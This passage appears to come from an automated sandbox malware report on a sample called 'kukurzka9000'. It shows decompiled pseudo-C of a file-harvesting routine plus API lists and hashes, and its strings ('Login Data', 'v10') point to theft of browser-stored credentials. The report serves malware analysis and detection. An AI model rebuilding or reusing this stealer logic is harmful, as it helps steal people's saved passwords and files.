                                                                                                                                                                        0x00402a39
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00402a39
                                                                                                                                                                        0x004029eb
                                                                                                                                                                        0x004029ec
                                                                                                                                                                        0x004029ed
                                                                                                                                                                        0x004029f4
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004029fa
                                                                                                                                                                        0x004029de
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004029de

                                                                                                                                                                        APIs
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 00402845
                                                                                                                                                                          • Part of subcall function 0040A69E: LocalFree.KERNEL32(00000000,?,?,0040B2D2), ref: 0040A701
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 00402894
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 004028A3
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 004028B2
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 004028BD
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 004028C8
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 004029ED
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 004029F4
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 00402A20
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 00402A27
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 00402C9F
                                                                                                                                                                        • DeleteFileW.KERNEL32(?), ref: 00402CA6
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 00402CAD
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000010.00000002.331137703.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000010.00000002.331335251.0000000000410000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_16_2_400000_kukurzka9000.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FreeLocal$DeleteFile
                                                                                                                                                                        • String ID: Login Data$pXet$v10
                                                                                                                                                                        • API String ID: 2194112602-2779801523
                                                                                                                                                                        • Opcode ID: 18e78e8ff6f735b836f31b0206ae2e491e165408470930e53818c058bcf09315
                                                                                                                                                                        • Instruction ID: 1f8185af0f1f67a55c4789a30ea30f5b3919f5d8761e9684d4856192d3457fc8
                                                                                                                                                                        • Opcode Fuzzy Hash: 18e78e8ff6f735b836f31b0206ae2e491e165408470930e53818c058bcf09315
                                                                                                                                                                        • Instruction Fuzzy Hash: 25F18071900225EFDB05DFA6DE48AAE7BB5FB08310F144935F515B72E0CBB89920CB69
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 39%
                                                                                                                                                                        			E00405B5B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, WCHAR* _a20, WCHAR* _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr* _a36, intOrPtr _a40, char _a44) {
                                                                                                                                                                        				void* _v12;
                                                                                                                                                                        				signed int _v16;
                                                                                                                                                                        				void* _v20;
                                                                                                                                                                        				void* _v24;
                                                                                                                                                                        				WCHAR* _v28;
                                                                                                                                                                        				void* _v32;
                                                                                                                                                                        				void* _v36;
                                                                                                                                                                        				intOrPtr _v40;
                                                                                                                                                                        				intOrPtr _v44;
                                                                                                                                                                        				void* _v48;
                                                                                                                                                                        				void* _v52;
                                                                                                                                                                        				signed int _v56;
                                                                                                                                                                        				void* _v60;
                                                                                                                                                                        				void* _v64;
                                                                                                                                                                        				void* _v68;
                                                                                                                                                                        				char _v620;
                                                                                                                                                                        				signed int _v632;
                                                                                                                                                                        				unsigned int _v636;
                                                                                                                                                                        				signed int _v664;
                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                        				void* __esi;
                                                                                                                                                                        				void* _t112;
                                                                                                                                                                        				signed int _t114;
                                                                                                                                                                        				void* _t117;
                                                                                                                                                                        				void* _t119;
                                                                                                                                                                        				void* _t120;
                                                                                                                                                                        				void* _t121;
                                                                                                                                                                        				WCHAR* _t122;
                                                                                                                                                                        				WCHAR* _t125;
                                                                                                                                                                        				void* _t127;
                                                                                                                                                                        				WCHAR* _t129;
                                                                                                                                                                        				intOrPtr _t135;
                                                                                                                                                                        				WCHAR* _t136;
                                                                                                                                                                        				void* _t138;
                                                                                                                                                                        				void* _t140;
                                                                                                                                                                        				signed int _t144;
                                                                                                                                                                        				signed int _t148;
                                                                                                                                                                        				WCHAR* _t151;
                                                                                                                                                                        				WCHAR* _t158;
                                                                                                                                                                        				WCHAR* _t162;
                                                                                                                                                                        				void* _t167;
                                                                                                                                                                        				unsigned int _t175;
                                                                                                                                                                        				WCHAR* _t177;
                                                                                                                                                                        				WCHAR* _t182;
                                                                                                                                                                        				void* _t186;
                                                                                                                                                                        				WCHAR* _t189;
                                                                                                                                                                        				WCHAR* _t192;
                                                                                                                                                                        				void* _t194;
                                                                                                                                                                        				void* _t195;
                                                                                                                                                                        				WCHAR* _t196;
                                                                                                                                                                        				void* _t201;
                                                                                                                                                                        				void* _t202;
                                                                                                                                                                        				char* _t232;
                                                                                                                                                                        				intOrPtr _t233;
                                                                                                                                                                        				intOrPtr _t239;
                                                                                                                                                                        				WCHAR* _t245;
                                                                                                                                                                        				intOrPtr _t249;
                                                                                                                                                                        				signed int _t251;
                                                                                                                                                                        				signed int _t252;
                                                                                                                                                                        				WCHAR* _t253;
                                                                                                                                                                        				void* _t254;
                                                                                                                                                                        				void* _t255;
                                                                                                                                                                        				void* _t259;
                                                                                                                                                                        				void* _t260;
                                                                                                                                                                        				unsigned int _t261;
                                                                                                                                                                        				void* _t262;
                                                                                                                                                                        				void* _t264;
                                                                                                                                                                        				void* _t265;
                                                                                                                                                                        				void* _t267;
                                                                                                                                                                        
                                                                                                                                                                        				_t1 =  &_a44; // 0x406321
                                                                                                                                                                        				_t249 =  *_t1;
                                                                                                                                                                        				_v44 = __edx;
                                                                                                                                                                        				_v40 = __ecx;
                                                                                                                                                                        				if(_t249 <= _a40) {
                                                                                                                                                                        					_v16 = _v16 & 0x00000000;
                                                                                                                                                                        					_t112 =  *((intOrPtr*)( *0x40e044))(0x40, 0x20a);
                                                                                                                                                                        					_t195 =  *((intOrPtr*)( *0x40e13c))(_t112, _a4);
                                                                                                                                                                        					_v52 = _t195;
                                                                                                                                                                        					_t114 =  *((intOrPtr*)( *0x40e08c))(_t195);
                                                                                                                                                                        					_t201 = 0x5c;
                                                                                                                                                                        					__eflags =  *((intOrPtr*)(_t195 + _t114 * 2 - 2)) - _t201;
                                                                                                                                                                        					_t202 = _t195;
                                                                                                                                                                        					if( *((intOrPtr*)(_t195 + _t114 * 2 - 2)) == _t201) {
                                                                                                                                                                        						_push( *0x40e3d0);
                                                                                                                                                                        						_v16 = 1;
                                                                                                                                                                        					} else {
                                                                                                                                                                        						_push( *0x40e1d0);
                                                                                                                                                                        					}
                                                                                                                                                                        					E0040188C(_t195, _t202, 0x104, _t259);
                                                                                                                                                                        					_t117 =  *((intOrPtr*)( *0x40e018))(_t195,  &_v664);
                                                                                                                                                                        					_v36 = _t117;
                                                                                                                                                                        					__eflags = _t117 - 0xffffffff;
                                                                                                                                                                        					if(_t117 != 0xffffffff) {
                                                                                                                                                                        						_t260 = _v36;
                                                                                                                                                                        						_t196 = _v16;
                                                                                                                                                                        						do {
                                                                                                                                                                        							__eflags = _v664 & 0x00000010;
                                                                                                                                                                        							if((_v664 & 0x00000010) == 0) {
                                                                                                                                                                        								_t119 =  *((intOrPtr*)( *0x40e044))(0x40, 0x410);
                                                                                                                                                                        								_t120 =  *((intOrPtr*)( *0x40e13c))(_t119, _a4);
                                                                                                                                                                        								__eflags = _t196;
                                                                                                                                                                        								if(_t196 == 0) {
                                                                                                                                                                        									_t233 =  *0x40e258; // 0x658558
                                                                                                                                                                        									_t120 = E0040A503(_t120, _t233);
                                                                                                                                                                        								}
                                                                                                                                                                        								_t232 =  &_v620;
                                                                                                                                                                        								_t121 = E0040A503(_t120, _t232);
                                                                                                                                                                        								_t261 = _v636;
                                                                                                                                                                        								_t251 = _v632;
                                                                                                                                                                        								__eflags = _a24;
                                                                                                                                                                        								_v12 = _t121;
                                                                                                                                                                        								if(_a24 == 0) {
                                                                                                                                                                        									_t122 = 0;
                                                                                                                                                                        									__eflags = 0;
                                                                                                                                                                        								} else {
                                                                                                                                                                        									_t232 = L"*.lnk";
                                                                                                                                                                        									_t122 = E0040A70E( &_v620, _t232);
                                                                                                                                                                        								}
                                                                                                                                                                        								__eflags = _v12;
                                                                                                                                                                        								_v28 = _t122;
                                                                                                                                                                        								if(_v12 == 0) {
                                                                                                                                                                        									L52:
                                                                                                                                                                        									LocalFree(_v12);
                                                                                                                                                                        									goto L53;
                                                                                                                                                                        								} else {
                                                                                                                                                                        									_t135 = _a28;
                                                                                                                                                                        									_t252 = (_t261 << 0x00000020 | _t251) >> 0xa;
                                                                                                                                                                        									asm("cdq");
                                                                                                                                                                        									__eflags = _t261 >> 0xa - _t232;
                                                                                                                                                                        									if(__eflags > 0) {
                                                                                                                                                                        										goto L52;
                                                                                                                                                                        									}
                                                                                                                                                                        									if(__eflags < 0) {
                                                                                                                                                                        										L23:
                                                                                                                                                                        										_t136 = E0040A70E( &_v620, _a12);
                                                                                                                                                                        										__eflags = _t136;
                                                                                                                                                                        										if(_t136 == 0) {
                                                                                                                                                                        											L25:
                                                                                                                                                                        											_t253 = _v28;
                                                                                                                                                                        											__eflags = _t253;
                                                                                                                                                                        											if(_t253 == 0) {
                                                                                                                                                                        												goto L52;
                                                                                                                                                                        											}
                                                                                                                                                                        											L28:
                                                                                                                                                                        											_t138 =  *((intOrPtr*)( *0x40e044))(0x40, 0x618);
                                                                                                                                                                        											_t140 = E0040A503( *((intOrPtr*)( *0x40e13c))(_t138,  *0x40e1b8), _v40);
                                                                                                                                                                        											_t239 =  *0x40e1b8; // 0x658718
                                                                                                                                                                        											_v20 = E0040A503(E0040A503(_t140, _t239), _v44);
                                                                                                                                                                        											__eflags = _t253;
                                                                                                                                                                        											if(_t253 == 0) {
                                                                                                                                                                        												_t264 = 0;
                                                                                                                                                                        												__eflags = 0;
                                                                                                                                                                        											} else {
                                                                                                                                                                        												_t264 = E00408FA5(_v12);
                                                                                                                                                                        											}
                                                                                                                                                                        											_t144 =  *((intOrPtr*)( *0x40e044))(0x40, 0x618);
                                                                                                                                                                        											_v16 = _t144;
                                                                                                                                                                        											_v32 =  *((intOrPtr*)( *0x40e044))(0x40, 0x410);
                                                                                                                                                                        											__eflags = _t253;
                                                                                                                                                                        											if(_t253 != 0) {
                                                                                                                                                                        												_t186 =  *((intOrPtr*)( *0x40e08c))(_t264);
                                                                                                                                                                        												__eflags = _t186 - 4;
                                                                                                                                                                        												if(_t186 > 4) {
                                                                                                                                                                        													_t189 =  *((intOrPtr*)( *0x40e0e0))(_t264, 0, 0x5c) + 2;
                                                                                                                                                                        													__eflags = _t189;
                                                                                                                                                                        													StrCpyW(_v32, _t189);
                                                                                                                                                                        												}
                                                                                                                                                                        											}
                                                                                                                                                                        											_t148 =  *((intOrPtr*)( *0x40e08c))(_a8);
                                                                                                                                                                        											__eflags = _t253;
                                                                                                                                                                        											_t150 =  !=  ? _v32 : 0;
                                                                                                                                                                        											_t151 = E0040A2AA(_v12 + _t148 * 2,  &_v16,  !=  ? _v32 : 0);
                                                                                                                                                                        											__eflags = _t151;
                                                                                                                                                                        											if(_t151 == 0) {
                                                                                                                                                                        												L51:
                                                                                                                                                                        												LocalFree(_v32);
                                                                                                                                                                        												LocalFree(_v16);
                                                                                                                                                                        												LocalFree(_v20);
                                                                                                                                                                        												goto L52;
                                                                                                                                                                        											} else {
                                                                                                                                                                        												_t218 = _v20;
                                                                                                                                                                        												_v20 = E0040A503(_v20, _v16);
                                                                                                                                                                        												__eflags = _t253;
                                                                                                                                                                        												if(_t253 == 0) {
                                                                                                                                                                        													_t254 = _v12;
                                                                                                                                                                        													L41:
                                                                                                                                                                        													_v24 =  *((intOrPtr*)( *0x40e044))(0x40, 0x20a);
                                                                                                                                                                        													_t158 = E0040A69E(_t218,  &_v24);
                                                                                                                                                                        													_t265 = _v24;
                                                                                                                                                                        													__eflags = _t158;
                                                                                                                                                                        													if(_t158 == 0) {
                                                                                                                                                                        														L50:
                                                                                                                                                                        														DeleteFileW(_t265);
                                                                                                                                                                        														LocalFree(_t265);
                                                                                                                                                                        														goto L51;
                                                                                                                                                                        													}
                                                                                                                                                                        													_t162 =  *((intOrPtr*)( *0x40e184))(_t254, _t265, 0);
                                                                                                                                                                        													__eflags = _t162;
                                                                                                                                                                        													if(_t162 == 0) {
                                                                                                                                                                        														goto L50;
                                                                                                                                                                        													}
                                                                                                                                                                        													_t255 =  *((intOrPtr*)( *0x40e03c))(_t265, 0x80000000, 1, 0, 4, 0, 0);
                                                                                                                                                                        													 *((intOrPtr*)( *0x40e0e4))(0xfde9, 0, _v20, 0xffffffff, 0, 0, 0, 0);
                                                                                                                                                                        													_v48 = 0;
                                                                                                                                                                        													_t167 =  *((intOrPtr*)( *0x40e044))(0x40, 0x30c);
                                                                                                                                                                        													_t245 = _v48;
                                                                                                                                                                        													_v24 = 0;
                                                                                                                                                                        													__eflags = _t245;
                                                                                                                                                                        													if(_t245 == 0) {
                                                                                                                                                                        														L49:
                                                                                                                                                                        														LocalFree(_t167);
                                                                                                                                                                        														CloseHandle(_t255);
                                                                                                                                                                        														goto L50;
                                                                                                                                                                        													}
                                                                                                                                                                        													 *((intOrPtr*)( *0x40e0e4))(0xfde9, 0, _v20, 0xffffffff, 0, _t245, 0, 0);
                                                                                                                                                                        													__eflags = 0;
                                                                                                                                                                        													if(0 == 0) {
                                                                                                                                                                        														L48:
                                                                                                                                                                        														_t167 = _v24;
                                                                                                                                                                        														goto L49;
                                                                                                                                                                        													}
                                                                                                                                                                        													__eflags = _v28;
                                                                                                                                                                        													if(_v28 == 0) {
                                                                                                                                                                        														L47:
                                                                                                                                                                        														_t223 = _a36;
                                                                                                                                                                        														_v56 = _v56 & 0x00000000;
                                                                                                                                                                        														_v68 = _v24;
                                                                                                                                                                        														_v64 = _t255;
                                                                                                                                                                        														_v60 = _t265;
                                                                                                                                                                        														 *_t223 =  *_a36 + 1;
                                                                                                                                                                        														asm("movsd");
                                                                                                                                                                        														asm("movsd");
                                                                                                                                                                        														asm("movsd");
                                                                                                                                                                        														asm("movsd");
                                                                                                                                                                        														goto L51;
                                                                                                                                                                        													}
                                                                                                                                                                        													_t175 =  *((intOrPtr*)( *0x40e14c))(_t255, 0);
                                                                                                                                                                        													__eflags = _t175 >> 0xa - _a28;
                                                                                                                                                                        													if(_t175 >> 0xa >= _a28) {
                                                                                                                                                                        														goto L48;
                                                                                                                                                                        													}
                                                                                                                                                                        													goto L47;
                                                                                                                                                                        												}
                                                                                                                                                                        												_t177 = E0040A70E(_t264, _a12);
                                                                                                                                                                        												__eflags = _t177;
                                                                                                                                                                        												if(_t177 == 0) {
                                                                                                                                                                        													L39:
                                                                                                                                                                        													LocalFree(_v32);
                                                                                                                                                                        													LocalFree(_v12);
                                                                                                                                                                        													LocalFree(_v20);
                                                                                                                                                                        													LocalFree(_v16);
                                                                                                                                                                        													LocalFree(_t264);
                                                                                                                                                                        													L53:
                                                                                                                                                                        													_t107 =  &_a44; // 0x406321
                                                                                                                                                                        													_t249 =  *_t107;
                                                                                                                                                                        													L54:
                                                                                                                                                                        													_t260 = _v36;
                                                                                                                                                                        													goto L55;
                                                                                                                                                                        												}
                                                                                                                                                                        												_t218 = _t264;
                                                                                                                                                                        												_t182 = E0040A70E(_t264, _a16);
                                                                                                                                                                        												__eflags = _t182;
                                                                                                                                                                        												if(_t182 != 0) {
                                                                                                                                                                        													goto L39;
                                                                                                                                                                        												}
                                                                                                                                                                        												_t254 =  *((intOrPtr*)( *0x40e13c))(_v12, _t264);
                                                                                                                                                                        												_v12 = _t254;
                                                                                                                                                                        												LocalFree(_t264);
                                                                                                                                                                        												goto L41;
                                                                                                                                                                        											}
                                                                                                                                                                        										}
                                                                                                                                                                        										_t192 = E0040A70E( &_v620, _a16);
                                                                                                                                                                        										__eflags = _t192;
                                                                                                                                                                        										if(_t192 == 0) {
                                                                                                                                                                        											_t253 = _v28;
                                                                                                                                                                        											goto L28;
                                                                                                                                                                        										}
                                                                                                                                                                        										goto L25;
                                                                                                                                                                        									}
                                                                                                                                                                        									__eflags = _t252 - _t135;
                                                                                                                                                                        									if(_t252 >= _t135) {
                                                                                                                                                                        										goto L52;
                                                                                                                                                                        									}
                                                                                                                                                                        									goto L23;
                                                                                                                                                                        								}
                                                                                                                                                                        							}
                                                                                                                                                                        							__eflags = _v620 - 0x2e;
                                                                                                                                                                        							if(_v620 == 0x2e) {
                                                                                                                                                                        								goto L55;
                                                                                                                                                                        							}
                                                                                                                                                                        							__eflags = _a20;
                                                                                                                                                                        							if(_a20 == 0) {
                                                                                                                                                                        								goto L55;
                                                                                                                                                                        							}
                                                                                                                                                                        							_t127 =  *((intOrPtr*)( *0x40e044))(0x40, 0x410);
                                                                                                                                                                        							_t262 =  *((intOrPtr*)( *0x40e000))(_t127, _a4,  &_v620);
                                                                                                                                                                        							_t129 = E0040A70E( &_v620, _a16);
                                                                                                                                                                        							__eflags = _t129;
                                                                                                                                                                        							if(_t129 == 0) {
                                                                                                                                                                        								_t26 = _t249 + 1; // 0x1
                                                                                                                                                                        								E00405B5B(_v40, _v44, _t262, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _t26);
                                                                                                                                                                        								_t267 = _t267 + 0x2c;
                                                                                                                                                                        							}
                                                                                                                                                                        							LocalFree(_t262);
                                                                                                                                                                        							goto L54;
                                                                                                                                                                        							L55:
                                                                                                                                                                        							_t125 =  *((intOrPtr*)( *0x40e148))(_t260,  &_v664);
                                                                                                                                                                        							__eflags = _t125;
                                                                                                                                                                        						} while (_t125 != 0);
                                                                                                                                                                        						_t110 =  &_v52; // 0x406321
                                                                                                                                                                        						LocalFree( *_t110);
                                                                                                                                                                        						FindClose(_t260);
                                                                                                                                                                        						goto L57;
                                                                                                                                                                        					} else {
                                                                                                                                                                        						LocalFree(_t195);
                                                                                                                                                                        						L57:
                                                                                                                                                                        						__eflags = 0;
                                                                                                                                                                        						return 0;
                                                                                                                                                                        					}
                                                                                                                                                                        				}
                                                                                                                                                                        				_t194 = 2;
                                                                                                                                                                        				return _t194;
                                                                                                                                                                        			}








































































                                                                                                                                                                        0x00405b67
                                                                                                                                                                        0x00405b67
                                                                                                                                                                        0x00405b6a
                                                                                                                                                                        0x00405b6d
                                                                                                                                                                        0x00405b73
                                                                                                                                                                        0x00405b82
                                                                                                                                                                        0x00405b8d
                                                                                                                                                                        0x00405ba1
                                                                                                                                                                        0x00405ba4
                                                                                                                                                                        0x00405ba7
                                                                                                                                                                        0x00405bab
                                                                                                                                                                        0x00405bb1
                                                                                                                                                                        0x00405bb6
                                                                                                                                                                        0x00405bb8
                                                                                                                                                                        0x00405bc2
                                                                                                                                                                        0x00405bc8
                                                                                                                                                                        0x00405bba
                                                                                                                                                                        0x00405bba
                                                                                                                                                                        0x00405bba
                                                                                                                                                                        0x00405bcf
                                                                                                                                                                        0x00405be1
                                                                                                                                                                        0x00405be3
                                                                                                                                                                        0x00405be6
                                                                                                                                                                        0x00405be9
                                                                                                                                                                        0x00405bf7
                                                                                                                                                                        0x00405bfa
                                                                                                                                                                        0x00405bfd
                                                                                                                                                                        0x00405bfd
                                                                                                                                                                        0x00405c04
                                                                                                                                                                        0x00405c9d
                                                                                                                                                                        0x00405ca9
                                                                                                                                                                        0x00405cab
                                                                                                                                                                        0x00405cad
                                                                                                                                                                        0x00405caf
                                                                                                                                                                        0x00405cb7
                                                                                                                                                                        0x00405cb7
                                                                                                                                                                        0x00405cbc
                                                                                                                                                                        0x00405cc4
                                                                                                                                                                        0x00405cc9
                                                                                                                                                                        0x00405cd1
                                                                                                                                                                        0x00405cd7
                                                                                                                                                                        0x00405cdb
                                                                                                                                                                        0x00405cde
                                                                                                                                                                        0x00405cf2
                                                                                                                                                                        0x00405cf2
                                                                                                                                                                        0x00405ce0
                                                                                                                                                                        0x00405ce0
                                                                                                                                                                        0x00405ceb
                                                                                                                                                                        0x00405ceb
                                                                                                                                                                        0x00405cf4
                                                                                                                                                                        0x00405cf8
                                                                                                                                                                        0x00405cfb
                                                                                                                                                                        0x00405fad
                                                                                                                                                                        0x00405fb0
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00405d01
                                                                                                                                                                        0x00405d01
                                                                                                                                                                        0x00405d04
                                                                                                                                                                        0x00405d08
                                                                                                                                                                        0x00405d0c
                                                                                                                                                                        0x00405d0e
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00405d14
                                                                                                                                                                        0x00405d1e
                                                                                                                                                                        0x00405d27
                                                                                                                                                                        0x00405d2c
                                                                                                                                                                        0x00405d2e
                                                                                                                                                                        0x00405d42
                                                                                                                                                                        0x00405d42
                                                                                                                                                                        0x00405d45
                                                                                                                                                                        0x00405d47
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00405d52
                                                                                                                                                                        0x00405d5e
                                                                                                                                                                        0x00405d74
                                                                                                                                                                        0x00405d79
                                                                                                                                                                        0x00405d90
                                                                                                                                                                        0x00405d93
                                                                                                                                                                        0x00405d95
                                                                                                                                                                        0x00405da3
                                                                                                                                                                        0x00405da3
                                                                                                                                                                        0x00405d97
                                                                                                                                                                        0x00405d9f
                                                                                                                                                                        0x00405d9f
                                                                                                                                                                        0x00405db1
                                                                                                                                                                        0x00405db8
                                                                                                                                                                        0x00405dc4
                                                                                                                                                                        0x00405dc7
                                                                                                                                                                        0x00405dc9
                                                                                                                                                                        0x00405dd2
                                                                                                                                                                        0x00405dd4
                                                                                                                                                                        0x00405dd7
                                                                                                                                                                        0x00405de5
                                                                                                                                                                        0x00405de5
                                                                                                                                                                        0x00405dec
                                                                                                                                                                        0x00405dec
                                                                                                                                                                        0x00405dd7
                                                                                                                                                                        0x00405dfa
                                                                                                                                                                        0x00405e04
                                                                                                                                                                        0x00405e09
                                                                                                                                                                        0x00405e0e
                                                                                                                                                                        0x00405e14
                                                                                                                                                                        0x00405e16
                                                                                                                                                                        0x00405f92
                                                                                                                                                                        0x00405f95
                                                                                                                                                                        0x00405f9e
                                                                                                                                                                        0x00405fa7
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00405e1c
                                                                                                                                                                        0x00405e1f
                                                                                                                                                                        0x00405e27
                                                                                                                                                                        0x00405e2a
                                                                                                                                                                        0x00405e2c
                                                                                                                                                                        0x00405e8d
                                                                                                                                                                        0x00405e90
                                                                                                                                                                        0x00405ea1
                                                                                                                                                                        0x00405ea4
                                                                                                                                                                        0x00405ea9
                                                                                                                                                                        0x00405eac
                                                                                                                                                                        0x00405eae
                                                                                                                                                                        0x00405f84
                                                                                                                                                                        0x00405f85
                                                                                                                                                                        0x00405f8c
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00405f8c
                                                                                                                                                                        0x00405ebd
                                                                                                                                                                        0x00405ebf
                                                                                                                                                                        0x00405ec1
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00405ee3
                                                                                                                                                                        0x00405ef6
                                                                                                                                                                        0x00405f05
                                                                                                                                                                        0x00405f08
                                                                                                                                                                        0x00405f0a
                                                                                                                                                                        0x00405f0d
                                                                                                                                                                        0x00405f10
                                                                                                                                                                        0x00405f12
                                                                                                                                                                        0x00405f76
                                                                                                                                                                        0x00405f77
                                                                                                                                                                        0x00405f7e
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00405f7e
                                                                                                                                                                        0x00405f2c
                                                                                                                                                                        0x00405f2e
                                                                                                                                                                        0x00405f30
                                                                                                                                                                        0x00405f73
                                                                                                                                                                        0x00405f73
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00405f73
                                                                                                                                                                        0x00405f32
                                                                                                                                                                        0x00405f36
                                                                                                                                                                        0x00405f4a
                                                                                                                                                                        0x00405f4a
                                                                                                                                                                        0x00405f50
                                                                                                                                                                        0x00405f54
                                                                                                                                                                        0x00405f59
                                                                                                                                                                        0x00405f65
                                                                                                                                                                        0x00405f6b
                                                                                                                                                                        0x00405f6d
                                                                                                                                                                        0x00405f6e
                                                                                                                                                                        0x00405f6f
                                                                                                                                                                        0x00405f70
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00405f70
                                                                                                                                                                        0x00405f40
                                                                                                                                                                        0x00405f45
                                                                                                                                                                        0x00405f48
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00405f48
                                                                                                                                                                        0x00405e33
                                                                                                                                                                        0x00405e38
                                                                                                                                                                        0x00405e3a
                                                                                                                                                                        0x00405e63
                                                                                                                                                                        0x00405e66
                                                                                                                                                                        0x00405e6f
                                                                                                                                                                        0x00405e78
                                                                                                                                                                        0x00405e81
                                                                                                                                                                        0x00405fb0
                                                                                                                                                                        0x00405fb0
                                                                                                                                                                        0x00405fb6
                                                                                                                                                                        0x00405fb6
                                                                                                                                                                        0x00405fb9
                                                                                                                                                                        0x00405fb9
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00405fb9
                                                                                                                                                                        0x00405e3f
                                                                                                                                                                        0x00405e41
                                                                                                                                                                        0x00405e46
                                                                                                                                                                        0x00405e48
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00405e55
                                                                                                                                                                        0x00405e58
                                                                                                                                                                        0x00405e5b
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00405e5b
                                                                                                                                                                        0x00405e16
                                                                                                                                                                        0x00405d39
                                                                                                                                                                        0x00405d3e
                                                                                                                                                                        0x00405d40
                                                                                                                                                                        0x00405d4f
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00405d4f
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00405d40
                                                                                                                                                                        0x00405d16
                                                                                                                                                                        0x00405d18
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00405d18
                                                                                                                                                                        0x00405cfb
                                                                                                                                                                        0x00405c0a
                                                                                                                                                                        0x00405c12
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00405c18
                                                                                                                                                                        0x00405c1c
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00405c2e
                                                                                                                                                                        0x00405c4c
                                                                                                                                                                        0x00405c4e
                                                                                                                                                                        0x00405c53
                                                                                                                                                                        0x00405c55
                                                                                                                                                                        0x00405c57
                                                                                                                                                                        0x00405c7d
                                                                                                                                                                        0x00405c82
                                                                                                                                                                        0x00405c82
                                                                                                                                                                        0x00405c86
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00405fbc
                                                                                                                                                                        0x00405fc9
                                                                                                                                                                        0x00405fcb
                                                                                                                                                                        0x00405fcb
                                                                                                                                                                        0x00405fd3
                                                                                                                                                                        0x00405fd7
                                                                                                                                                                        0x00405fde
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00405beb
                                                                                                                                                                        0x00405bec
                                                                                                                                                                        0x00405fe4
                                                                                                                                                                        0x00405fe4
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00405fe4
                                                                                                                                                                        0x00405be9
                                                                                                                                                                        0x00405b77
                                                                                                                                                                        0x00000000

                                                                                                                                                                        APIs
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 00405BEC
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000010.00000002.331137703.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000010.00000002.331335251.0000000000410000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_16_2_400000_kukurzka9000.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FreeLocal
                                                                                                                                                                        • String ID: !c@$!c@$*.lnk$.$pXet
                                                                                                                                                                        • API String ID: 2826327444-128453335
                                                                                                                                                                        • Opcode ID: b0d5b7ba67e721dc2419ad7a18b72dabb38105fce5c2b9528fe6729ad57d29b4
                                                                                                                                                                        • Instruction ID: a0bd4d6dd4f3a97f7616e57fc29639dad099fc1712c2800218aeb084a22374ad
                                                                                                                                                                        • Opcode Fuzzy Hash: b0d5b7ba67e721dc2419ad7a18b72dabb38105fce5c2b9528fe6729ad57d29b4
                                                                                                                                                                        • Instruction Fuzzy Hash: 75D1AC71A00216ABEF04DFA5CD44EAF7775EF48300F104929FA15B72A0DB78A951CFA9
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • StrCpyW.SHLWAPI(00000000,00000000), ref: 0040674F
                                                                                                                                                                          • Part of subcall function 0040A503: lstrlenW.KERNEL32(?,00000000,?,00000000,00000000,?,00408633), ref: 0040A516
